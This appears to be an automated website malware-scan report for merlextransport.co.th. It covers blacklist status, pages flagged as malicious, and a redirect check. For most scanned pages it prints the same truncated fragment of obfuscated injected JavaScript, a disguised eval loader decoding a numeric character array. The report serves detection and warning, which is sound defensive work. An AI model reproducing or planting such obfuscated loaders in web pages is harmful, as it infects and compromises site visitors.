Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=merlextransport.co.th
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://merlextransport.co.th/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.merlextransport.co.th/ | 200 OK Content-Length: 16980 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,105,111,30,58,32,99,109,96,117,108,99,107,116,45,97,111,101,96,114,98,69,107,99,106,101,109,114,37,39,104,100,111,97,108,99,36,41,58,11,7,13,9,30,29,32,31,103,109,46,114,112,96,32,60,30,36,10 Antivirus reports:
| ||
http://www.merlextransport.co.th/Scripts/swfobject_modified.js | 200 OK Content-Length: 23995 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,103,111,112,99,98,31,59,29,100,110,97,114,109,100,108,113,46,98,112,98,97,115,99,66,108,100,107,98,110,115,38,36,105,101,112,94,109,100,37,38,59,12,8,10,10,31,30,29,32,102,110,111,102,97,44,1 Antivirus reports:
| ||
http://www.merlextransport.co.th/index.html | 200 OK Content-Length: 16980 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,105,111,30,58,32,99,109,96,117,108,99,107,116,45,97,111,101,96,114,98,69,107,99,106,101,109,114,37,39,104,100,111,97,108,99,36,41,58,11,7,13,9,30,29,32,31,103,109,46,114,112,96,32,60,30,36,10 Antivirus reports:
| ||
http://www.merlextransport.co.th/about.html | 200 OK Content-Length: 12059 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,105,111,30,58,32,99,109,96,117,108,99,107,116,45,97,111,101,96,114,98,69,107,99,106,101,109,114,37,39,104,100,111,97,108,99,36,41,58,11,7,13,9,30,29,32,31,103,109,46,114,112,96,32,60,30,36,10 Antivirus reports:
| ||
http://www.merlextransport.co.th/service.html | 200 OK Content-Length: 11279 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,105,111,30,58,32,99,109,96,117,108,99,107,116,45,97,111,101,96,114,98,69,107,99,106,101,109,114,37,39,104,100,111,97,108,99,36,41,58,11,7,13,9,30,29,32,31,103,109,46,114,112,96,32,60,30,36,10 Antivirus reports:
| ||
http://www.merlextransport.co.th/gallery.html | 200 OK Content-Length: 9344 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,105,111,30,58,32,99,109,96,117,108,99,107,116,45,97,111,101,96,114,98,69,107,99,106,101,109,114,37,39,104,100,111,97,108,99,36,41,58,11,7,13,9,30,29,32,31,103,109,46,114,112,96,32,60,30,36,10 Antivirus reports:
| ||
http://www.merlextransport.co.th/contact.html | 200 OK Content-Length: 12118 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,105,111,30,58,32,99,109,96,117,108,99,107,116,45,97,111,101,96,114,98,69,107,99,106,101,109,114,37,39,104,100,111,97,108,99,36,41,58,11,7,13,9,30,29,32,31,103,109,46,114,112,96,32,60,30,36,10 Antivirus reports:
| ||
http://www.merlextransport.co.th/merlexgroup.html | 200 OK Content-Length: 8123 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,105,111,30,58,32,99,109,96,117,108,99,107,116,45,97,111,101,96,114,98,69,107,99,106,101,109,114,37,39,104,100,111,97,108,99,36,41,58,11,7,13,9,30,29,32,31,103,109,46,114,112,96,32,60,30,36,10 Antivirus reports:
| ||
http://www.merlextransport.co.th/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://www.merlextransport.co.th/Q12.html | 200 OK Content-Length: 10564 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document.body--}catch(gdsgd){ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122,11,7,32,31,30,29,118,96,112,29,105,111,30,58,32,99,109,96,117,108,99,107,116,45,97,111,101,96,114,98,69,107,99,106,101,109,114,37,39,104,100,111,97,108,99,36,41,58,11,7,13,9,30,29,32,31,103,109,46,114,112,96,32,60,30,36,10 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: merlextransport.co.th
Result:
GET / HTTP/1.1
Host: merlextransport.co.th
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: merlextransport.co.th
Referer: http://www.google.com/search?q=merlextransport.co.th
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: merlextransport.co.th
Referer: http://www.google.com/search?q=merlextransport.co.th
Result:
The result is similar to the first query. There are no suspicious redirects found.